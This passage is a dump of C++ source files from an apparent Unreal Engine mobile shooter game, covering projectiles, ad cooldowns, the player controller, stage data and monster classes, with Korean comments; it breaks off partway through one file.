"/Source/Project_Gun/Public/BlueScriptObject/Projectile/PG_ProjectileFlame.h", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#pragma once\n\n#include \"Project_Gun/Project_Gun.h\"\n#include \"BlueScriptObject/Projectile/PG_Projectile.h\"\n#include \"PG_ProjectileFlame.generated.h\"\n\n/**\n * \n */\nUCLASS()\nclass PROJECT_GUN_API APG_ProjectileFlame : public APG_Projectile\n{\n\tGENERATED_BODY()\n\t\npublic :\n\tAPG_ProjectileFlame();\n\nprotected:\n\tvirtual void PostInitializeComponents() override;\n\tvirtual void BeginPlay() override;\t// Called when the game starts or when spawned\n\tvirtual void Tick(float DeltaTime) override;\t// Called every frame\n\npublic:\n\tvirtual void FireInDirection(const struct FPGWeaponData* pWeaponData, const FVector& ShootDirection, bool bMonsterWeapon = false) override;\n\n\tvoid SetScaleTime(float fScaleTime);\n\nprivate :\n\tvoid UpdateCollisionScale(float DeltaTime);\n\nprotected:\n\tvirtual void OnTargetBeginOverlap(UPrimitiveComponent* OverlappedComp, AActor* OtherActor, UPrimitiveComponent* OtherComp, int32 OtherBodyIndex, bool bFromWeep, const FHitResult& SweepResult) override;\n\tvirtual void OnPlayEndParticle(UParticleSystemComponent* ParticleSystemComponent) override;\n\nprivate:\n\tUPROPERTY(VisibleAnywhere, BlueprintReadWrite, Category = \"PG ProjectileData\", Meta = (AllowPrivateAccess = true))\n\tUStaticMeshComponent*\tCollisionMeshComponent;\t// 화염 방사시 충돌 체크를 위한 Static Mesh\n\n\tfloat m_fScaleTime = 0.0f;\n};\n" }, { "alpha_fraction": 0.7093712687492371, "alphanum_fraction": 0.7224199175834656, "avg_line_length": 25.35416603088379, "blob_id": "c717dfccd9ab3c3dd63eae51d09e1f2d950c8861", "content_id": "f429b2667afe681f3fce6f3a8dbe1153d08b407e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2531, "license_type": "no_license", "max_line_length": 106, "num_lines": 96, "path": "/Source/Project_Gun/Private/Game/AD/PG_ADData.cpp", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n\n#include \"Game/AD/PG_ADData.h\"\n#include \"Game/GameInstance/PG_GameInstance.h\"\n#include \"Game/GameMode/PG_GameModeStage.h\"\n#include \"Game/GameMode/PG_GameModeMainLobby.h\"\n\nPG_ADData::PG_ADData()\n{\n}\n\nPG_ADData::~PG_ADData()\n{\n}\n\nvoid PG_ADData::Init(UPG_GameInstance* pGameInstance)\n{\n\tABCHECK(nullptr != pGameInstance);\n\tm_kRemainReViewableTime.Init(0.0f, (int32)EADType::eAT_Max);\n\n\tfor (int32 nIndex = 0; nIndex < m_kRemainReViewableTime.Num(); ++nIndex)\n\t{\n\t\tauto pADTableData = pGameInstance->GetADTableData((EADType)nIndex);\n\t\tif (nullptr == pADTableData)\n\t\t{\n\t\t\tABLOG(Warning, TEXT(\"Can't Find ADTable Data [Index : %d]\"), nIndex);\n\t\t\tcontinue;\n\t\t}\n\n\t\tm_kRemainReViewableTime[nIndex] = (float)pADTableData->ReViewableTime;\n\t}\n}\n\nvoid PG_ADData::Update(float DeltaTime)\n{\n\tABCHECK(nullptr != G_PGWorld);\n\n\tauto pGameInstance = Cast<UPG_GameInstance>(G_PGWorld->GetGameInstance());\n\tABCHECK(nullptr != pGameInstance);\n\n\tfor (int32 nIndex = 0; nIndex < m_kRemainReViewableTime.Num(); ++nIndex)\n\t{\n\t\tauto pADTableData = pGameInstance->GetADTableData((EADType)nIndex);\n\t\tif (nullptr == pADTableData)\n\t\t\tcontinue;\n\n\t\tif (0.0f < m_kRemainReViewableTime[nIndex])\n\t\t{\n\t\t\t// MainLobby\n\t\t\tif (pADTableData->TimeDeduction_MainLobby && Cast<APG_GameModeMainLobby>(G_PGWorld->GetAuthGameMode()))\n\t\t\t{\n\t\t\t\tm_kRemainReViewableTime[nIndex] -= DeltaTime;\n\t\t\t\tif (0.0f > m_kRemainReViewableTime[nIndex])\n\t\t\t\t\tm_kRemainReViewableTime[nIndex] = 0.0f;\n\n\t\t\t\tcontinue;\n\t\t\t}\n\n\t\t\t// GameModeStage\n\t\t\tif (pADTableData->TimeDeduction_StagePlay && Cast<APG_GameModeStage>(G_PGWorld->GetAuthGameMode()))\n\t\t\t{\n\t\t\t\tm_kRemainReViewableTime[nIndex] -= DeltaTime;\n\t\t\t\tif (0.0f > m_kRemainReViewableTime[nIndex])\n\t\t\t\t\tm_kRemainReViewableTime[nIndex] = 0.0f;\n\n\t\t\t\tcontinue;\n\t\t\t}\n\t\t}\n\t}\n}\n\nvoid PG_ADData::Reset(EADType ekADType)\n{\n\tABCHECK(nullptr != G_PGWorld);\n\n\tauto pGameInstance = Cast<UPG_GameInstance>(G_PGWorld->GetGameInstance());\n\tABCHECK(nullptr != pGameInstance);\n\n\tauto pADTableData = pGameInstance->GetADTableData(ekADType);\n\tABCHECK(nullptr != pADTableData);\n\n\tm_kRemainReViewableTime[(int32)ekADType] = (float)pADTableData->ReViewableTime;\n}\n\nbool PG_ADData::IsAbleViewAD(EADType ekADType)\n{\n\tABCHECK(ekADType < EADType::eAT_Max, false);\n\treturn (0.0f >= m_kRemainReViewableTime[(int32)ekADType]);\n}\n\nint32 PG_ADData::GetRemainReViewableTime(EADType ekADType)\n{\n\tABCHECK(ekADType < EADType::eAT_Max, 0);\n\treturn (int32)m_kRemainReViewableTime[(int32)ekADType];\n}" }, { "alpha_fraction": 0.7871659994125366, "alphanum_fraction": 0.7875423431396484, "avg_line_length": 33.07051467895508, "blob_id": "e29655b5a249ef003ccbdce4f53a294e43a9e625", "content_id": "378cc7cdf7fc32639b90cecc4d824164fb401acf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 5374, "license_type": "no_license", "max_line_length": 242, "num_lines": 156, "path": "/Source/Project_Gun/Private/Player/PlayerController/PG_PlayerController.cpp", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#include \"Player/PlayerController/PG_PlayerController.h\"\n#include \"Player/PlayerState/PG_MyPlayerState.h\"\n#include \"Character/PG_MonChar.h\"\n#include \"Game/GameState/PG_GameStateStage.h\"\n#include \"Game/GameMode/PG_GameModeStage.h\"\n#include \"Game/GameInstance/PG_GameInstance.h\"\n#include \"UI/PG_UserWidgetScreenPlayStage.h\"\n#include \"UI/PG_UserWidgetScreenStageFailed.h\"\n#include \"UI/PG_UserWidgetScreenStageClear.h\"\n#include \"UI/PG_VirtualJoystick.h\"\n\n#include <GameFramework/TouchInterface.h>\n#include <GameFramework/InputSettings.h>\n#include <Widgets/Input/SVirtualJoystick.h>\n\nAPG_PlayerController::APG_PlayerController()\n{\n}\n\nvoid APG_PlayerController::CreateTouchInterface()\n{\n\tULocalPlayer* pLocalPlayer = Cast<ULocalPlayer>(Player);\n\n\t// do we want to show virtual joysticks?\n\tif (pLocalPlayer && pLocalPlayer->ViewportClient && SPG_VirtualJoystick::ShouldDisplayTouchInterface())\n\t{\n\t\t// in case we already had one, remove it\n\t\tif (VirtualJoystick.IsValid())\n\t\t{\n\t\t\tCast<ULocalPlayer>(Player)->ViewportClient->RemoveViewportWidgetContent(VirtualJoystick.ToSharedRef());\n\t\t}\n\n\t\tif (CurrentTouchInterface == nullptr)\n\t\t{\n\t\t\t// load what the game wants to show at startup\n\t\t\tFSoftObjectPath DefaultTouchInterfaceName = GetDefault<UInputSettings>()->DefaultTouchInterface;\n\n\t\t\tif (DefaultTouchInterfaceName.IsValid())\n\t\t\t{\n\t\t\t\t// activate this interface if we have it\n\t\t\t\tCurrentTouchInterface = LoadObject<UTouchInterface>(NULL, *DefaultTouchInterfaceName.ToString());\n\t\t\t}\n\t\t}\n\n\t\tif (CurrentTouchInterface)\n\t\t{\n\t\t\t// 재정의한 SPG_VirtualJoystick 조이스틱 사용\n\t\t\tTSharedPtr<SPG_VirtualJoystick> CustomJoystick = SNew(SPG_VirtualJoystick);\n\t\t\tCustomJoystick->BindPlayerController(this);\n\n\t\t\tVirtualJoystick = CustomJoystick;\n\n\t\t\t// add it to the player's viewport\n\t\t\tpLocalPlayer->ViewportClient->AddViewportWidgetContent(CustomJoystick.ToSharedRef());\n\n\t\t\tActivateTouchInterface(CurrentTouchInterface);\n\t\t}\n\t}\n}\n\nvoid APG_PlayerController::PostInitializeComponents()\n{\n\tSuper::PostInitializeComponents();\n}\n\nvoid APG_PlayerController::OnPossess(APawn* aPawn)\n{\n\tSuper::OnPossess(aPawn);\n}\n\nvoid APG_PlayerController::BeginPlay()\n{\n\tSuper::BeginPlay();\n\n\t//UserWidgetPlayStage = CreateWidget<UPG_UserWidgetPlayStage>(this, LoadClass<UPG_UserWidgetPlayStage>(NULL, TEXT(\"WidgetBlueprint'/Game/PG/Blueprints/WidgetBP/WB_PlayStage.WB_PlayStage_C'\")));\n\t//ABCHECK(nullptr != UserWidgetPlayStage);\n\tm_pUserWidgetScreenPlayStage = CreateWidget<UPG_UserWidgetScreenPlayStage>(this, LoadClass<UPG_UserWidgetScreenPlayStage>(NULL, TEXT(\"WidgetBlueprint'/Game/PG/Blueprints/WidgetBP/Screen/WB_ScreenPlayStage.WB_ScreenPlayStage_C'\")));\n\tABCHECK(nullptr != m_pUserWidgetScreenPlayStage);\n\tm_pWidgetStageClear = CreateWidget<UPG_UserWidgetScreenStageClear>(this, LoadClass<UPG_UserWidgetScreenStageClear>(NULL, TEXT(\"WidgetBlueprint'/Game/PG/Blueprints/WidgetBP/Screen/WB_ScreenStageClear.WB_ScreenStageClear_C'\")));\n\tABCHECK(nullptr != m_pWidgetStageClear);\n\tm_pUserWidgetScreenStageFailed = CreateWidget<UPG_UserWidgetScreenStageFailed>(this, LoadClass<UPG_UserWidgetScreenStageFailed>(NULL, TEXT(\"WidgetBlueprint'/Game/PG/Blueprints/WidgetBP/Screen/WB_ScreenStageFailed.WB_ScreenStageFailed_C'\")));\n\tABCHECK(nullptr != m_pUserWidgetScreenStageFailed);\n\n\tauto pGameStateStage = Cast<APG_GameStateStage>(GetWorld()->GetGameState());\n\tif (pGameStateStage)\n\t{\n\t\tpGameStateStage->StageClearDelegate.AddUObject(this, &APG_PlayerController::OnStateClear);\n\t\tpGameStateStage->StageFailedDelegate.AddUObject(this, &APG_PlayerController::OnStateFailed);\n\t}\n\n\tm_pUserWidgetScreenPlayStage->AddToViewport();\n\tm_pUserWidgetScreenPlayStage->Init();\n}\n\nvoid APG_PlayerController::SetupInputComponent()\n{\n\tSuper::SetupInputComponent();\n}\n\nvoid APG_PlayerController::SetLockJoystickInput(bool a_bLock)\n{\n\tif (a_bLock)\n\t\tActivateTouchInterface(nullptr);\n\telse\n\t\tCreateTouchInterface();\n}\n\nvoid APG_PlayerController::OnStateClear()\n{\n\tSetLockJoystickInput(true);\n\t//SetPause(true);\n\n\tauto pGameStateStage = Cast<APG_GameStateStage>(GetWorld()->GetGameState());\n\tABCHECK(nullptr != pGameStateStage);\n\n\tauto pPlayerState = GetPlayerState<APG_MyPlayerState>();\n\tABCHECK(nullptr != pPlayerState);\n\n\t// 스테이지 클리어 보상 획득\n\tint32 nRewardPoint = pPlayerState->GetOriginalPlayerData()->RewardPoint;\n\tpPlayerState->SetRewardPoint(nRewardPoint + pGameStateStage->GetClearTotalPoint());\n\n\tABCHECK(nullptr != m_pWidgetStageClear);\n\tm_pWidgetStageClear->AddToViewport();\n\tm_pWidgetStageClear->SetVisibility(ESlateVisibility::Visible);\n\tm_pWidgetStageClear->UpdateClearStageLayout();\n}\n\nvoid APG_PlayerController::OnStateFailed()\n{\n\tSetLockJoystickInput(true);\n\tSetPause(true);\n\n\tABCHECK(nullptr != m_pUserWidgetScreenStageFailed);\n\tm_pUserWidgetScreenStageFailed->AddToViewport();\n\tm_pUserWidgetScreenStageFailed->SetVisibility(ESlateVisibility::Visible);\n\tm_pUserWidgetScreenStageFailed->UpdateLayout();\n}\n\nvoid APG_PlayerController::OnFire()\n{\n\tauto pPlayerState = GetPlayerState<APG_MyPlayerState>();\n\tABCHECK(nullptr != pPlayerState);\n\tABCHECK(nullptr != m_pUserWidgetScreenPlayStage)\n\n\tif (false == pPlayerState->UseAmmo())\n\t{\n\t\t// 기본 무기로 바꾼다.\n\t\tpPlayerState->ChangeDefaultWeapon();\n\t\tm_pUserWidgetScreenPlayStage->OnChangeWeapon();\n\t}\n\n\tm_pUserWidgetScreenPlayStage->OnFire();\n}" }, { "alpha_fraction": 0.5857638716697693, "alphanum_fraction": 0.6013888716697693, "avg_line_length": 23.19327735900879, "blob_id": "f09fd110dc0859d2d189f915778cd7a6dc01882b", "content_id": "c264047e623254e63cce0ffa912b2b5e7b3a92a3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 3414, "license_type": "no_license", "max_line_length": 115, "num_lines": 119, "path": "/Source/Project_Gun/Public/Define/PG_GamePlayData.h", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "#pragma once\n\n#include \"Project_Gun/Project_Gun.h\"\n\n#include \"PG_GamePlayData.generated.h\"\n\n//=========================================================================================\n// 플레이어 데이터\n//=========================================================================================\nUSTRUCT(BlueprintType)\nstruct FPGPlayerData\n{\n\tGENERATED_BODY()\n\npublic:\n\tFPGPlayerData() : EquipWeaponInventoryIndex(0), bExtendWeaponSlot(false), RewardPoint(0)\n\t{ \n\t\tPlayerWeaponInventory.Init(0, PG_MAX_WEAPON_SLOT);\n\t\tPlayerWeaponAmmo.Init(0, PG_MAX_WEAPON_SLOT);\n\t}\n\n\t// 장착중인 무기의 Inventory의 Index (SlotIndex 저장)\n\tUPROPERTY()\n\tint32 EquipWeaponInventoryIndex;\n\n\t// 인벤토리 (현재 3개까지 확장 가능)\n\tUPROPERTY()\n\tbool bExtendWeaponSlot;\n\n\t// 인벤토리 (현재 3개까지 확장 가능 - WeaponTableIndex 저장)\n\tUPROPERTY()\n\tTArray<int32> PlayerWeaponInventory;\n\n\t// 탄약 재고량 (SlotIndex 저장)\n\tUPROPERTY()\n\tTArray<int32> PlayerWeaponAmmo;\n\n\t// 보유중인 재화 포인트\n\tUPROPERTY()\n\tint32 RewardPoint;\n};\n\n//=========================================================================================\n// 보유중인 무기 데이터\n//=========================================================================================\nUSTRUCT(BlueprintType)\nstruct FPGWeaponOwnData\n{\n\tGENERATED_BODY()\n\npublic:\n\tFPGWeaponOwnData() : IsUnlock(false), PowerLevel(1), MagLevel(1){ }\n\n\t// 무기 구매 여부\n\tUPROPERTY()\n\tbool IsUnlock;\n\n\t// 무기 공격력 레벨\n\tUPROPERTY()\n\tint32 PowerLevel;\n\n\t// 탄창 증가 레벨\n\tUPROPERTY()\n\tint32 MagLevel;\n};\n\n//=========================================================================================\n// 스테이지 플레이 데이터\n//=========================================================================================\nUSTRUCT(BlueprintType)\nstruct FPGStagePlayData\n{\n\tGENERATED_BODY()\n\npublic:\n\tFPGStagePlayData() : StageID(0), NumberOfMonsters(0), NumberOfMonstersKilled(0), \n\t\tNumberOfMonstersMuiltiKill(0), NumberOfMonstersMuiltiKilled(0), PlayTime(0), RemainTime(0), KillRewardPoint(0){ }\n\n\t// 현재 플레이중인 스테이지 ID\n\tUPROPERTY(VisibleAnywhere, BlueprintReadWrite)\n\tint32 StageID;\n\n\t// 설치된 몬스터의 수 (클리어 목표)\n\tUPROPERTY(VisibleAnywhere, BlueprintReadWrite)\n\tint32 NumberOfMonsters;\n\n\t// 죽인 몬스터의 수\n\tUPROPERTY(VisibleAnywhere, BlueprintReadWrite)\n\tint32 NumberOfMonstersKilled;\n\n\t// 다중 처치해야 할 몬스터의 수 (멀티킬 클리어 목표)\n\tUPROPERTY(VisibleAnywhere, BlueprintReadWrite)\n\tint32 NumberOfMonstersMuiltiKill;\n\n\t// 다중 처치한 몬스터의 수 (멀티킬)\n\tUPROPERTY(VisibleAnywhere, BlueprintReadWrite)\n\tint32 NumberOfMonstersMuiltiKilled;\n\n\t// 플레이 시간\n\tUPROPERTY(VisibleAnywhere, BlueprintReadWrite)\n\tint32 PlayTime;\n\n\t// 남은 시간\n\tUPROPERTY(VisibleAnywhere, BlueprintReadWrite)\n\tint32 RemainTime;\n\n\t// 몬스터 처치로부터 얻은 재화 (스테이지 클리어로 얻은 재화는 포함되지 않으니 주의할 것)\n\tUPROPERTY(VisibleAnywhere, BlueprintReadWrite)\n\tint32 KillRewardPoint;\n};\n\nenum EStageClearType\n{\n\teSCT_AmountKill = 0,\t\t// 목표한 몬스터 처치 후 목표지점 도달\n\teSCT_ClearTime,\t\t\t\t// 제한시간 내 모든 몬스터 처치 후 목표지점 도달\n\teSCT_Lethal,\t\t\t\t// 필살기 사용으로 목표 멀티킬 이상을 달성 후 목표지점 도달\n\n\teSCT_Max\n};\n\n" }, { "alpha_fraction": 0.7562909126281738, "alphanum_fraction": 0.7614615559577942, "avg_line_length": 25.135135650634766, "blob_id": "f3fa4bfcc1f73ba769789b216e42bdc6c7548331", "content_id": "6bfd1c980edc9afe8c1131d114da8617cb884704", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 3061, "license_type": "no_license", "max_line_length": 199, "num_lines": 111, "path": "/Source/Project_Gun/Private/BlueScriptObject/Projectile/PG_Projectile.cpp", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#include \"BlueScriptObject/Projectile/PG_Projectile.h\"\n#include \"BlueScriptObject/Weapon/PG_Weapon.h\"\n#include \"Character/PG_MonChar.h\"\n#include \"Character/PG_MyChar.h\"\n#include \"Define/PG_TableData.h\"\n\n// Sets default values\nAPG_Projectile::APG_Projectile()\n{\n \t// Set this actor to call Tick() every frame. You can turn this off to improve performance if you don't need it.\n\tPrimaryActorTick.bCanEverTick = true;\n\n\t// 구체를 단순 콜리전 표현으로 사용합니다.\n\tCollisionComponent = CreateDefaultSubobject<USphereComponent>(TEXT(\"SphereComponent\"));\n\t// 구체의 콜리전 반경을 설정합니다.\n\tCollisionComponent->InitSphereRadius(50.0f);\n\t// 루트 컴포넌트를 콜리전 컴포넌트로 설정합니다.\n\tCollisionComponent->SetCollisionProfileName(TEXT(\"NoCollision\"));\n\n\tRootComponent = CollisionComponent;\n\n\tvStartPos = FVector::ZeroVector;\n}\n\n// Called when the game starts or when spawned\nvoid APG_Projectile::BeginPlay()\n{\n\tSuper::BeginPlay();\n}\n\nvoid APG_Projectile::PostInitializeComponents()\n{\n\tSuper::PostInitializeComponents();\n}\n\n// Called every frame\nvoid APG_Projectile::Tick(float DeltaTime)\n{\n\tSuper::Tick(DeltaTime);\n\n\tif (IsEndBulletRange())\n\t\tDestroy();\n}\n\n// 프로젝타일의 속도를 발사 방향으로 초기화시키는 함수입니다.\nvoid APG_Projectile::FireInDirection(const FPGWeaponData* pWeaponData, const FVector& ShootDirection, bool bMonsterWeapon)\n{\n\n}\n\nbool APG_Projectile::IsEndBulletRange()\n{\n\tif (0 == WeaponData.BulletRange)\n\t\treturn false;\t// 무한\n\n\tfloat fBulletRange = FMath::Abs<float>(FVector::Distance(vStartPos, GetActorLocation()));\n\treturn (fBulletRange >= (float)WeaponData.BulletRange);\n}\n\nbool APG_Projectile::IsOwnerMonster()\n{\n\tauto OwnerWeapon = Cast<APG_Weapon>(GetOwner());\n\tABCHECK(nullptr != OwnerWeapon, false);\n\n\treturn OwnerWeapon->IsOwnerMonster();\n}\nbool APG_Projectile::IsOwnerMyPlayer()\n{\n\tauto OwnerWeapon = Cast<APG_Weapon>(GetOwner());\n\tABCHECK(nullptr != OwnerWeapon, false);\n\n\treturn OwnerWeapon->IsOwnerMyPlayer();\n}\n\nbool APG_Projectile::IsAttackNullity(FVector vTargetPos)\n{\n\tFCollisionQueryParams Params(NAME_None, false, this);\n\n\tif (GetWorld()->LineTraceTestByProfile(\n\t\tGetActorLocation(),\n\t\tvTargetPos,\n\t\tTEXT(\"AttackNullity\"),\n\t\tParams)\n\t\t)\n\t{\n//#ifdef ENABLE_DRAW_DEBUG\n//\t\tDrawDebugPoint(GetWorld(), vTargetPos, 10.0f, FColor::Black, false, 1.02f);\n//\t\tDrawDebugLine(GetWorld(), GetActorLocation(), vTargetPos, FColor::Black, false, 1.02f);\n//#endif\n\t\treturn true;\n\t}\n\n\treturn false;\n}\n\nvoid APG_Projectile::OnTargetBeginOverlap(UPrimitiveComponent* OverlappedComp, AActor* OtherActor, UPrimitiveComponent* OtherComp, int32 OtherBodyIndex, bool bFromWeep, const FHitResult& SweepResult)\n{\n\n}\n\nvoid APG_Projectile::OnTargetHit(UPrimitiveComponent* HitComponent, AActor* OtherActor, UPrimitiveComponent* OtherComp, FVector NormalImpulse, const FHitResult& Hit)\n{\n\n}\n\nvoid APG_Projectile::OnPlayEndParticle(UParticleSystemComponent* ParticleSystemComponent)\n{\n\n}\n" }, { "alpha_fraction": 0.7594433426856995, "alphanum_fraction": 0.7594433426856995, "avg_line_length": 20.913043975830078, "blob_id": "509cbba88c08826ee550c050c02180ffc534d0fe", "content_id": "c9b730586cef6a15e1b9da374070139bcaf0818b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 505, "license_type": "no_license", "max_line_length": 79, "num_lines": 23, "path": "/Source/Project_Gun/Private/Character/PG_MonCharBoss.cpp", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#include \"Character/PG_MonCharBoss.h\"\n#include \"Character/PG_MonChar.h\"\n#include \"Game/GameInstance/PG_GameInstance.h\"\n#include \"AI/PG_AICon_Mon.h\"\n\nAPG_MonCharBoss::APG_MonCharBoss()\n{\n\tAIControllerClass = APG_AICon_Mon::StaticClass();\n}\n\nvoid APG_MonCharBoss::BeginPlay()\n{\n\tSuper::BeginPlay();\n}\n\nvoid APG_MonCharBoss::PostInitializeComponents()\n{\n\tSuper::PostInitializeComponents();\n\n\tMonsterData = &MonsterBossData;\n}" }, { "alpha_fraction": 0.7557677030563354, "alphanum_fraction": 0.7621320486068726, "avg_line_length": 26.955554962158203, "blob_id": "bea357c89b4e59b78bfee2fd36549c635cc43b14", "content_id": "aa2ed85361573d45bbc13e9fc09519790d9345da", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1259, "license_type": "no_license", "max_line_length": 127, "num_lines": 45, "path": "/Source/Project_Gun/Private/Character/Component/PG_ComponentCharScale.cpp", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#include \"Character/Component/PG_ComponentCharScale.h\"\n\n// Sets default values for this component's properties\nUPG_ComponentCharScale::UPG_ComponentCharScale()\n{\n\t// Set this component to be initialized when the game starts, and to be ticked every frame. You can turn these features\n\t// off to improve performance if you don't need them.\n\tPrimaryComponentTick.bCanEverTick = false;\n\n\t// ...\n}\n\n\n// Called when the game starts\nvoid UPG_ComponentCharScale::BeginPlay()\n{\n\tSuper::BeginPlay();\n}\n\n\n// Called every frame\nvoid UPG_ComponentCharScale::TickComponent(float DeltaTime, ELevelTick TickType, FActorComponentTickFunction* ThisTickFunction)\n{\n\tSuper::TickComponent(DeltaTime, TickType, ThisTickFunction);\n}\n\nvoid UPG_ComponentCharScale::SetActorScaleRange(FVector MinScale, FVector MaxScale)\n{\n\tm_vMinScale = MinScale;\n\tm_vMaxScale = MaxScale;\n}\n\nvoid UPG_ComponentCharScale::SetActorScale(float Ratio)\n{\n\tABCHECK(0 <= Ratio && Ratio <= 1.0f);\n\n\tFVector vNormal = m_vMaxScale - m_vMinScale;\n\tFVector vScale = m_vMinScale + (vNormal * FMath::Clamp<float>(Ratio, 0.0f, 1.0f));\n\n\tauto OwnerActor = GetOwner();\n\tif (OwnerActor)\n\t\tOwnerActor->SetActorRelativeScale3D(vScale);\n}" }, { "alpha_fraction": 0.5992695689201355, "alphanum_fraction": 0.6052457094192505, "avg_line_length": 29.1200008392334, "blob_id": "1c464179b5cb351ee33604dc27450540b2856ee5", "content_id": "26b858dc7fb2ed1c13aa66c7ba1d4fa5f367dd0f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 3460, "license_type": "no_license", "max_line_length": 110, "num_lines": 100, "path": "/Source/Project_Gun/Public/Game/GameState/PG_GameStateStage.h", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#pragma once\n\n#include \"Project_Gun/Project_Gun.h\"\n\n#include <GameFramework/GameStateBase.h>\n#include \"PG_GameStateStage.generated.h\"\n\nDECLARE_MULTICAST_DELEGATE(FOnStageTimer);\nDECLARE_MULTICAST_DELEGATE(FOnStageClear);\nDECLARE_MULTICAST_DELEGATE(FOnStageFailed);\nDECLARE_MULTICAST_DELEGATE(FOnUdpateWidgetPlayStage);\nDECLARE_MULTICAST_DELEGATE(FOnGateOpen);\nDECLARE_MULTICAST_DELEGATE_OneParam(FOnViewAD, bool);\n\n/**\n * GameState : 게임의 상태를 정의한다. 게임이 시작되었는지, 중단되었는지, A팀의 스토어가 몇점인지 등을 포함한다.\n */\nUCLASS()\nclass PROJECT_GUN_API APG_GameStateStage : public AGameStateBase\n{\n\tGENERATED_BODY()\n\npublic:\n\tAPG_GameStateStage();\n\nprotected:\n\tvirtual void PostInitializeComponents() override;\n\tvirtual void BeginPlay() override;\n\npublic:\n\tbool\tInitStageData();\n\n\tvoid\tMonsterDie(class APG_MonChar* KillMon, bool IsLethalAttack);\n\n\t//===================================================\n\t// Stage Info.\n\t//===================================================\n\tconst struct FPGStagePlayData*\tGetStagePlayData()\t{ return &StagePlayData; }\n\tint32\tGetLevelInstallMonsterCount();\t// 현재 레벨에 설치된 몬스터의 수\n\tint32\tGetRemainStageTimer();\t\t\t// 현재 남은 시간\n\tvoid\tSetMaxLethalKill(int32 a_nMaxLethalKill);\t// 필살기로 죽인 몬스터 수 갱신\n\tint32\tGetMaxLethalKill();\t\t\t\t\t\t\t// 필살기로 죽은 최대 몬스터의 수\n\t// Stage Clear Info.\n\tint32\tGetClearTotalPoint();\t\t\t// 획득한 포인트 (총합 : 스테이지 클리어 + 미션 클리어 + 몬스터 처치 + 광고)\n\tint32\tGetClearStagePoint();\t\t\t// 스테이지 클리어 포인트\n\tint32\tGetClearMissionPoint();\t\t\t// 미션 클리어 포인트\n\tint32\tGetClearMonsterKillPoint();\t\t// 몬스터 처치 포인트\n\n\n\t//===================================================\n\t// AD (광고)\n\t//===================================================\n\tbool\tIsViewAD();\t\t\t\t\t// 광고를 보았는지 확인\n\tvoid\tSetViewAD(bool bEnable);\n\tbool\tRequestViewAD();\t\t\t// 광고 요청\n\npublic:\n\t//==========================================================\n\t// Stage\n\t//==========================================================\n\tFOnStageTimer\tStageTimerDelegate;\t\t// 스테이지 타이머\n\tFOnStageClear\tStageClearDelegate;\t\t// 스테이지 클리어\n\tFOnStageFailed\tStageFailedDelegate;\t// 스테이지 실패\n\tFOnGateOpen\t\tGateOpenDelegate;\t\t// 스테이지 클리어 게이트 오픈\n\tFOnUdpateWidgetPlayStage UdpateWidgetPlayStage;\t\t// 스테이지 클리어 목표 현황 업데이트 요청\n\n\t//==========================================================\n\t// AD\n\t//==========================================================\n\tFOnViewAD\t\tOnViewAD;\t\t\t\t// 광고를 보았음\n\npublic:\n\tvoid\tOnCheckStageClear();\n\tvoid\tOnCheckStageFailed();\n\n\tUFUNCTION()\n\tvoid\tOnKillAddRewardPoint(int32 a_nAddRewardPoint);\t// 몬스터 처치로 인한 포인트 획득\n\nprotected :\n\tvoid\tOnStageTimerTick();\n\nprivate :\n\tbool\tCheckStageData();\n\nprivate :\n\tUPROPERTY(VisibleAnywhere, BlueprintReadWrite, Category = \"PG StageData\", Meta = (AllowPrivateAccess = true))\n\tstruct FPGStagePlayData StagePlayData;\n\n\tUPROPERTY()\n\tFTimerHandle StageTimerHandle;\n\n\tconst struct FPGStageData* StageData;\n\n\t//===================================================\n\t// AD (광고)\n\t//===================================================\n\tbool m_bViewAD = false;\n};\n" }, { "alpha_fraction": 0.7371019721031189, "alphanum_fraction": 0.7450012564659119, "avg_line_length": 25.054662704467773, "blob_id": "62427a44219e1e66ce80d43b3cc9c1587fcdb39d", "content_id": "0da98f88e390bd500e6e5ffa37f5b3753074bea1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 8224, "license_type": "no_license", "max_line_length": 159, "num_lines": 311, "path": "/Source/Project_Gun/Private/Character/PG_MonChar.cpp", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#include \"Character/PG_MonChar.h\"\n#include \"Character/PG_MyChar.h\"\n#include \"Character/Component/PG_ComponentCharScale.h\"\n#include \"Game/GameInstance/PG_GameInstance.h\"\n#include \"Game/GameState/PG_GameStateStage.h\"\n#include \"AI/PG_AICon_Mon.h\"\n\n#include <Components/WidgetComponent.h>\n#include <Components/ProgressBar.h>\n#include <GameFramework/DamageType.h>\n#include <DrawDebugHelpers.h>\n\n// Sets default values\nAPG_MonChar::APG_MonChar()\n{\n \t// Set this character to call Tick() every frame. You can turn this off to improve performance if you don't need it.\n\tPrimaryActorTick.bCanEverTick = true;\n\n#ifdef TEST_CODE\n\t// 임시코드 : 가데이터 몬스터 리소스 위치 